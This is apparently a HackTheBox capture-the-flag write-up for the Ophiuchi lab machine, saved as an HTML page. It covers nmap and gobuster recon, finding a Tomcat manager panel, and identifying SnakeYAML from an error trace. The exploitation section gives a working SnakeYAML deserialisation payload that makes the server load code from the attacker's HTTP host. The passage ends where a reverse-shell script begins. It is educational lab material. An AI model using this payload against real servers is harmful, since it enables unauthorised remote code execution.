-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathophiuchi.html
246 lines (212 loc) · 85.9 KB
/
ophiuchi.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- iOS Safari -->
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<!-- Chrome, Firefox OS and Opera Status Bar Color -->
<meta name="theme-color" content="#FFFFFF">
<link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.11.1/katex.min.css">
<link rel="stylesheet" type="text/css"
href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.19.0/themes/prism.min.css">
<link rel="stylesheet" type="text/css" href="css/SourceSansPro.css">
<link rel="stylesheet" type="text/css" href="css/theme.css">
<link rel="stylesheet" type="text/css" href="css/notablog.css">
<!-- Favicon -->
<link rel="shortcut icon" href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Faf7d66d0-6402-4a6f-b9f5-00d2eb9e3482%2Fhackerman.gif?table=collection&id=92e319e1-0c5e-49c7-adc1-7d48fe74e022">
<style>
:root {
font-size: 20px;
}
</style>
<title>Ophiuchi - HackTheBox Writeup (10.10.10.227) | [email protected]~$</title>
<meta property="og:type" content="blog">
<meta property="og:title" content="Ophiuchi - HackTheBox Writeup (10.10.10.227)">
<meta name="description" content="Medium-difficulty Linux box on exploiting insecure deserialisation vulnerability in a SnakeYAML applet. Privilege escalation by reverse-engineering and forging a deploy-ready WebAssembly binary to exploit a command injection vulnerability in the deploy script.">
<meta property="og:description" content="Medium-difficulty Linux box on exploiting insecure deserialisation vulnerability in a SnakeYAML applet. Privilege escalation by reverse-engineering and forging a deploy-ready WebAssembly binary to exploit a command injection vulnerability in the deploy script.">
<meta property="og:image" content="https://www.hackthebox.eu/storage/avatars/82b3289bbabf88da886bc9f45802ac17.png">
<style>
.DateTagBar {
margin-top: 1.0rem;
}
</style>
</head>
<body>
<nav class="Navbar">
<a href="/">
<div class="Navbar__Btn">
<span><img class="inline-img-icon" src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Faf7d66d0-6402-4a6f-b9f5-00d2eb9e3482%2Fhackerman.gif?table=collection&id=92e319e1-0c5e-49c7-adc1-7d48fe74e022"></span>
<span>Home</span>
</div>
</a>
</nav>
<header class="Header">
<div class="Header__Spacer Header__Spacer--NoCover">
</div>
<div class="Header__Icon">
<span><img class="inline-img-icon" src="https://www.hackthebox.eu/storage/avatars/82b3289bbabf88da886bc9f45802ac17.png"></span>
</div>
<h1 class="Header__Title">Ophiuchi - HackTheBox Writeup (10.10.10.227)</h1>
<div class="DateTagBar">
<span class="DateTagBar__Item DateTagBar__Date">Posted on Sat, Jul 17, 2021</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--yellow">
<a href="tag/Medium">Medium</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--orange">
<a href="tag/Linux">Linux</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--red">
<a href="tag/Web_Application">Web Application</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--yellow">
<a href="tag/Insecure_Deserialisation">Insecure Deserialisation</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--brown">
<a href="tag/WebAssembly">WebAssembly</a>
</span>
</div>
<div>
Medium-difficulty Linux box on exploiting insecure deserialisation vulnerability in a SnakeYAML applet. Privilege escalation by reverse-engineering and forging a deploy-ready WebAssembly binary to exploit a command injection vulnerability in the deploy script.
</div>
</header>
<article id="https://www.notion.so/09dfee72ef994b07811a5df6ce84776c" class="PageRoot PageRoot--FullWidth"><h2 id="https://www.notion.so/d77bfc29aa1744c08626fddc5a6a6e30" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/d77bfc29aa1744c08626fddc5a6a6e30"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Recon</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/b9241683299e4081ac19fbbbc5c851ee" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Port scan:</span></span><div id="https://www.notion.so/c131a9ed1ea14bd88bd1eb62b29dda32" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nmap -p- 10.10.10.227 > ports.nmap</code></span></span></p></div><pre id="https://www.notion.so/c45bd0a372384fd992200a6f455a7c38" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>PORT STATE SERVICE
22/tcp open ssh
8080/tcp open http-proxy</span></span></span></code></pre></li><li id="https://www.notion.so/b45bbb15a06a430aaa0c2e8c9d0ad103" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Targeted scan:</span></span><div id="https://www.notion.so/8dc28f5b671a4e9a83e137d9854fe159" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nmap -sC -sV -p 22,8080 10.10.10.227 > targeted.nmap</code></span></span></p></div><pre id="https://www.notion.so/aabf975d9d694097a6f22c9e39f3f34a" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 6d:fc:68:e2:da:5e:80:df:bc:d0:45:f5:29:db:04:ee (RSA)
| 256 7a:c9:83:7e:13:cb:c3:f9:59:1e:53:21:ab:19:76:ab (ECDSA)
|_ 256 17:6b:c3:a8:fc:5d:36:08:a1:40:89:d2:f4:0a:c6:46 (ED25519)
8080/tcp open http Apache Tomcat 9.0.38
|_http-title: Parse YAML
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
- OpenSSH 8.2p1 Ubuntu 4ubuntu0.1, Apache Tomcat 9.0.38</span></span></span></code></pre><div id="https://www.notion.so/46fff2f0f2424e6996737994ed591937" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">OpenSSH 8.2p1 Ubuntu 4ubuntu0.1, Apache Tomcat 9.0.38</span></span></p></div></li></ul><h2 id="https://www.notion.so/55954a8be6264bd9b583ac902528451b" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/55954a8be6264bd9b583ac902528451b"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Enumeration</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/2c54f7d8497846af9961f8b1eac70698" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Add vhost to </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/etc/hosts</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/12cf9871b84b421aae502ee121e8045e" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>10.10.10.227 ophiuchi.htb</span></span></span></code></pre></li></ul><div id="https://www.notion.so/41fc23f0e0554363b2212fc8f28d0ce9" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">HTTP Enumeration</strong></span></span></p></div><ul class="BulletedListWrapper"><li id="https://www.notion.so/a11e0d883fe7489a9d0b04158500a9e7" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Website is an online YAML parser, which is a possible vector for a deserialisation attack.</span></span><div id="https://www.notion.so/27baa1f8d724400b971e24b3504735b0" class="Image Image--Normal"><figure><a href="https://i.imgur.com/zZkm6Oo.png?width=912"><img src="https://i.imgur.com/zZkm6Oo.png?width=912" style="width:912px"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div></li><li id="https://www.notion.so/1d6b24b04a524e9aa8b6843696b9a722" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Bruteforcing directory listing with </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">dirbuster</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/d279a85d54654a59ab1b7eec1ccded52" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ gobuster dir -u http://10.10.10.227:8080/ -w ../Common/directory-list-2.3-medium.txt -x .php,.html</code></span></span></p></div></li><li id="https://www.notion.so/ea485fd74d7d4a6e81897ed6311732d9" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found admin panel:</span></span><div id="https://www.notion.so/eab3aef591e54ad2a513001ff2a56859" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://ophiuchi.htb:8080/manager/html">http://ophiuchi.htb:8080/manager/html</a></span></span></p></div></li><li id="https://www.notion.so/207c4c0dcc9046c9afe8d98080316f74" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Upon failing login dialog box, we get the message:</span></span><pre id="https://www.notion.so/4357f870411446468d6301f24cd7b321" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>You are not authorized to view this page. If you have not changed any configuration files, please examine the file conf/tomcat-users.xml in your installation. That file must contain the credentials to let you use this webapp.
For example, to add the manager-gui role to a user named tomcat with a password of s3cret, add the following to the config file listed above.
<span class="token tag"><span class="token tag"><span class="token punctuation"><</span>role</span> <span class="token attr-name">rolename</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>manager-gui<span class="token punctuation">"</span></span><span class="token punctuation">/></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation"><</span>user</span> <span class="token attr-name">username</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>tomcat<span class="token punctuation">"</span></span> <span class="token attr-name">password</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>s3cret<span class="token punctuation">"</span></span> <span class="token attr-name">roles</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>manager-gui<span class="token punctuation">"</span></span><span class="token punctuation">/></span></span></span></span></span></code></pre></li><li id="https://www.notion.so/281b857bc28c4abfb002c5b79c0eab46" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">User credentials needed to access </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/manager</code></span><span class="SemanticString"> page is stored in </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">conf/tomcat-users.xml</code></span></span></li><li id="https://www.notion.so/25ae058ba67041389b7af98eb494db0e" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Using </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">dirbuster</code></span><span class="SemanticString"> to ping the manager page reveals the application name:</span></span><pre id="https://www.notion.so/c4657f91594541859773809c58d0b0d2" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>Mar 07, 2021 8:48:44 PM org.apache.commons.httpclient.HttpMethodDirector processWWWAuthChallenge
INFO: No credentials available for BASIC 'Tomcat Manager Application'@10.10.10.227:8080</span></span></span></code></pre></li><li id="https://www.notion.so/7bc1d89864634028ba1057ebdac530cd" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Sending data on the YAML parser page redirects us to </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://10.10.10.227:8080/Servlet">http://10.10.10.227:8080/Servlet</a></span><span class="SemanticString"> and the server responds with:</span></span><pre id="https://www.notion.so/e4d8f2a536d44d15bfcf652a80514b48" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>Due to security reason this feature has been temporarily on hold. We will soon fix the issue!</span></span></span></code></pre></li><li id="https://www.notion.so/4d24da4c7ac44dd68a05fbc2166f0c11" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Looks like the parser feature is "on hold", but that doesn't necessarily mean our input didn't get deserialised!</span></span></li><li id="https://www.notion.so/b22e87be2f774e69b8e27d1462583237" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Intercepting parser POST request with Burp Suite:</span></span><pre id="https://www.notion.so/bc44e21da4164bef8de3098f8c18e8af" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>POST /Servlet HTTP/1.1
Host: 10.10.10.227:8080
Content-Length: 67
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: </span></span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://10.10.10.227:8080/"><span>http://10.10.10.227:8080</span></a></span><span class="SemanticString"><span>
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,</span></span><span class="SemanticString"><em class="SemanticString__Fragment SemanticString__Fragment--Italic"><span>/</span></em></span><span class="SemanticString"><span>;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: </span></span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://10.10.10.227:8080/"><span>http://10.10.10.227:8080/</span></a></span><span class="SemanticString"><span>
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: JSESSIONID=3E409C2627922DEF55DAFEB93DEC71B6
Connection: close
data=%7B%22hello%22%3A+%22there%22%2C+%22how%22%3A+%22are+you%22%7D</span></span></span></code></pre></li><li id="https://www.notion.so/4d267b0331444a65a632b0bd7c28f604" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Technically speaking, YAML is a superset of JSON. This means that a YAML parser should be able to understand JSON.</span></span></li><li id="https://www.notion.so/45252bea512640b7b9a2391a50133c86" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">After entering special characters </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">!!</code></span><span class="SemanticString">, we get a HTTP 500 response instead of the normal redirect:</span></span><pre id="https://www.notion.so/09a4455b053a49aebcb8bb0c2227bc4b" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token keyword">while</span> scanning a tag
in <span class="token char">'string'</span><span class="token punctuation">,</span> line <span class="token number">1</span><span class="token punctuation">,</span> column <span class="token number">1</span><span class="token operator">:</span>
<span class="token operator">!</span><span class="token operator">!</span>
<span class="token operator">^</span>
expected <span class="token constant">URI</span><span class="token punctuation">,</span> but found <span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span>
in <span class="token char">'string'</span><span class="token punctuation">,</span> line <span class="token number">1</span><span class="token punctuation">,</span> column <span class="token number">3</span><span class="token operator">:</span>
<span class="token operator">!</span><span class="token operator">!</span>
<span class="token operator">^</span>
<span class="token class-name"><span class="token namespace">org<span class="token punctuation">.</span>yaml<span class="token punctuation">.</span>snakeyaml<span class="token punctuation">.</span>scanner<span class="token punctuation">.</span></span>ScannerImpl</span><span class="token punctuation">.</span><span class="token function">scanTagUri</span><span class="token punctuation">(</span><span class="token class-name">ScannerImpl</span><span class="token punctuation">.</span>java<span class="token operator">:</span><span class="token number">2158</span><span class="token punctuation">)</span>
<span class="token class-name"><span class="token namespace">org<span class="token punctuation">.</span>yaml<span class="token punctuation">.</span>snakeyaml<span class="token punctuation">.</span>scanner<span class="token punctuation">.</span></span>ScannerImpl</span><span class="token punctuation">.</span><span class="token function">scanTag</span><span class="token punctuation">(</span><span class="token class-name">ScannerImpl</span><span class="token punctuation">.</span>java<span class="token operator">:</span><span class="token number">1537</span><span class="token punctuation">)</span>
<span class="token class-name"><span class="token namespace">org<span class="token punctuation">.</span>yaml<span class="token punctuation">.</span>snakeyaml<span class="token punctuation">.</span>scanner<span class="token punctuation">.</span></span>ScannerImpl</span><span class="token punctuation">.</span><span class="token function">fetchTag</span><span class="token punctuation">(</span><span class="token class-name">ScannerImpl</span><span class="token punctuation">.</span>java<span class="token operator">:</span><span class="token number">954</span><span class="token punctuation">)</span>
<span class="token class-name"><span class="token namespace">org<span class="token punctuation">.</span>yaml<span class="token punctuation">.</span>snakeyaml<span class="token punctuation">.</span>scanner<span class="token punctuation">.</span></span>ScannerImpl</span><span class="token punctuation">.</span><span class="token function">fetchMoreTokens</span><span class="token punctuation">(</span><span class="token class-name">ScannerImpl</span><span class="token punctuation">.</span>java<span class="token operator">:</span><span class="token number">372</span><span class="token punctuation">)</span>
<span class="token class-name"><span class="token namespace">org<span class="token punctuation">.</span>yaml<span class="token punctuation">.</span>snakeyaml<span class="token punctuation">.</span>scanner<span class="token punctuation">.</span></span>ScannerImpl</span><span class="token punctuation">.</span><span class="token function">checkToken</span><span class="token punctuation">(</span><span class="token class-name">ScannerImpl</span><span class="token punctuation">.</span>java<span class="token operator">:</span><span class="token number">227</span><span class="token punctuation">)</span>
<span class="token class-name"><span class="token namespace">org<span class="token punctuation">.</span>yaml<span class="token punctuation">.</span>snakeyaml<span class="token punctuation">.</span>parser<span class="token punctuation">.</span></span>ParserImpl</span>$<span class="token class-name">ParseImplicitDocumentStart</span><span class="token punctuation">.</span><span class="token function">produce</span><span class="token punctuation">(</span><span class="token class-name">ParserImpl</span><span class="token punctuation">.</span>java<span class="token operator">:</span><span class="token number">195</span><span class="token punctuation">)</span>
<span class="token class-name"><span class="token namespace">org<span class="token punctuation">.</span>yaml<span class="token punctuation">.</span>snakeyaml<span class="token punctuation">.</span>parser<span class="token punctuation">.</span></span>ParserImpl</span><span class="token punctuation">.</span><span class="token function">peekEvent</span><span class="token punctuation">(</span><span class="token class-name">ParserImpl</span><span class="token punctuation">.</span>java<span class="token operator">:</span><span class="token number">158</span><span class="token punctuation">)</span>
<span class="token class-name"><span class="token namespace">org<span class="token punctuation">.</span>yaml<span class="token punctuation">.</span>snakeyaml<span class="token punctuation">.</span>parser<span class="token punctuation">.</span></span>ParserImpl</span><span class="token punctuation">.</span><span class="token function">checkEvent</span><span class="token punctuation">(</span><span class="token class-name">ParserImpl</span><span class="token punctuation">.</span>java<span class="token operator">:</span><span class="token number">148</span><span class="token punctuation">)</span>
<span class="token class-name"><span class="token namespace">org<span class="token punctuation">.</span>yaml<span class="token punctuation">.</span>snakeyaml<span class="token punctuation">.</span>composer<span class="token punctuation">.</span></span>Composer</span><span class="token punctuation">.</span><span class="token function">getSingleNode</span><span class="token punctuation">(</span><span class="token class-name">Composer</span><span class="token punctuation">.</span>java<span class="token operator">:</span><span class="token number">118</span><span class="token punctuation">)</span>
<span class="token class-name"><span class="token namespace">org<span class="token punctuation">.</span>yaml<span class="token punctuation">.</span>snakeyaml<span class="token punctuation">.</span>constructor<span class="token punctuation">.</span></span>BaseConstructor</span><span class="token punctuation">.</span><span class="token function">getSingleData</span><span class="token punctuation">(</span><span class="token class-name">BaseConstructor</span><span class="token punctuation">.</span>java<span class="token operator">:</span><span class="token number">150</span><span class="token punctuation">)</span>
<span class="token class-name"><span class="token namespace">org<span class="token punctuation">.</span>yaml<span class="token punctuation">.</span>snakeyaml<span class="token punctuation">.</span></span>Yaml</span><span class="token punctuation">.</span><span class="token function">loadFromReader</span><span class="token punctuation">(</span><span class="token class-name">Yaml</span><span class="token punctuation">.</span>java<span class="token operator">:</span><span class="token number">490</span><span class="token punctuation">)</span>
<span class="token class-name"><span class="token namespace">org<span class="token punctuation">.</span>yaml<span class="token punctuation">.</span>snakeyaml<span class="token punctuation">.</span></span>Yaml</span><span class="token punctuation">.</span><span class="token function">load</span><span class="token punctuation">(</span><span class="token class-name">Yaml</span><span class="token punctuation">.</span>java<span class="token operator">:</span><span class="token number">416</span><span class="token punctuation">)</span>
<span class="token class-name">Servlet</span><span class="token punctuation">.</span><span class="token function">doPost</span><span class="token punctuation">(</span><span class="token class-name">Servlet</span><span class="token punctuation">.</span>java<span class="token operator">:</span><span class="token number">15</span><span class="token punctuation">)</span>
<span class="token class-name"><span class="token namespace">javax<span class="token punctuation">.</span>servlet<span class="token punctuation">.</span>http<span class="token punctuation">.</span></span>HttpServlet</span><span class="token punctuation">.</span><span class="token function">service</span><span class="token punctuation">(</span><span class="token class-name">HttpServlet</span><span class="token punctuation">.</span>java<span class="token operator">:</span><span class="token number">652</span><span class="token punctuation">)</span>
<span class="token class-name"><span class="token namespace">javax<span class="token punctuation">.</span>servlet<span class="token punctuation">.</span>http<span class="token punctuation">.</span></span>HttpServlet</span><span class="token punctuation">.</span><span class="token function">service</span><span class="token punctuation">(</span><span class="token class-name">HttpServlet</span><span class="token punctuation">.</span>java<span class="token operator">:</span><span class="token number">733</span><span class="token punctuation">)</span>
<span class="token class-name"><span class="token namespace">org<span class="token punctuation">.</span>apache<span class="token punctuation">.</span>tomcat<span class="token punctuation">.</span>websocket<span class="token punctuation">.</span>server<span class="token punctuation">.</span></span>WsFilter</span><span class="token punctuation">.</span><span class="token function">doFilter</span><span class="token punctuation">(</span><span class="token class-name">WsFilter</span><span class="token punctuation">.</span>java<span class="token operator">:</span><span class="token number">53</span><span class="token punctuation">)</span></span></span></span></code></pre></li><li id="https://www.notion.so/52962d3f9ded426aa2ffa943a6ecbeb7" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">We discover the Java package used for parsing YAML is SnakeYAML, which we can try to exploit via a deserialisation attack.</span></span></li></ul><h2 id="https://www.notion.so/09571ed36434451fa3e27e20bcfa7525" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/09571ed36434451fa3e27e20bcfa7525"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Exploitation</span></span></h2><div id="https://www.notion.so/e2b318e3a4014554a565b71a6a5963ef" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">SnakeYAML Deserialisation Attack</strong></span></span></p></div><ul class="BulletedListWrapper"><li id="https://www.notion.so/b242ae9d9f4647b3a975537afa468244" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">A special syntax in SnakeYAML, the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">!!<constructor></code></span><span class="SemanticString">, allows the constructor of any Java class to be called when parsing YAML data.</span></span></li><li id="https://www.notion.so/094b1df7238b48e7a9c545fc7a6c534a" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">This effectively allows the attacker to gain remote code execution on the server.</span></span></li><li id="https://www.notion.so/dfe67edadfda4ebbb247ac6ead42703e" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Host HTTP server to capture requests:</span></span><div id="https://www.notion.so/8f48c2eba1114e38afb574d2f5a04325" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ python -m http.server</code></span></span></p></div></li><li id="https://www.notion.so/7cbb7d97968b449ebace157fd8023b1c" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Enter the following in the parser:</span></span><pre id="https://www.notion.so/d504cbc03171471c88be2da31e37188b" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token tag">!!javax.script.ScriptEngineManager</span> <span class="token punctuation">[</span>
<span class="token tag">!!java.net.URLClassLoader</span> <span class="token punctuation">[</span><span class="token punctuation">[</span>
<span class="token tag">!!java.net.URL</span> <span class="token punctuation">[</span><span class="token string">"http://10.10.14.103:8000/owata.html"</span><span class="token punctuation">]</span>
<span class="token punctuation">]</span><span class="token punctuation">]</span>
<span class="token punctuation">]</span></span></span></span></code></pre></li><li id="https://www.notion.so/229193c426d14ebc81d08f0a95c41a48" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">This payload should make SnakeYAML invoke the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">ScriptEngineManager</code></span><span class="SemanticString"> constructor and make a GET request to our HTTP server.</span></span></li><li id="https://www.notion.so/c8ed3043e18947788fca5232c268dd66" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Upon clicking parse, we get a GET request from the victim, confirming that the parser is indeed still active and deserialising data:</span></span><pre id="https://www.notion.so/e6a9635186d64245bc5e90c7fd9da9da" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>10.10.10.227 <span class="token punctuation">-</span> <span class="token punctuation">-</span> <span class="token punctuation">[</span>07/Mar/2021 21<span class="token punctuation">:</span><span class="token datetime number">14:02</span><span class="token punctuation">]</span> "GET /owata.html HTTP/1.1" 302 <span class="token punctuation">-</span>
10.10.10.227 <span class="token punctuation">-</span> <span class="token punctuation">-</span> <span class="token punctuation">[</span>07/Mar/2021 21<span class="token punctuation">:</span><span class="token datetime number">14:02</span><span class="token punctuation">]</span> "GET / HTTP/1.1" 200 <span class="token punctuation">-</span></span></span></span></code></pre></li><li id="https://www.notion.so/dc50d009bafe479c8bc4c27c18421833" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Using a Java template file by </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://github.com/artsploit/yaml-payload">artsploit</a></span><span class="SemanticString">, let's try to make SnakeYAML execute a reverse shell.</span></span></li><li id="https://www.notion.so/4a9f5683c73d41dc90f08af1f28c1ca7" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">rev.sh</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/bae395af86e24b63b5a8f96bcdc512f8" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token shebang important">#!/bin/sh</span>
